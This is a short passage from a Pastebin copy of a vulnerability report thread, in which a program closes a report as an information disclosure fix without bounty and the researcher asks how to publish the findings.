  1217. We were unable to fully validate RCE but were able to remediate the information disclosure portion of the vulnerability and closed it as such. As noted in our profile our program does not offer bounties. Thanks again for the submission.
  1218.  
  1219. ---
  1220.  
  1221. 2017-05-29 08:18:19 +0000: @cayce (comment)
  1222. Okay jokers, I'm ready to publish my findings. What is the process to make this report publicly visible?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!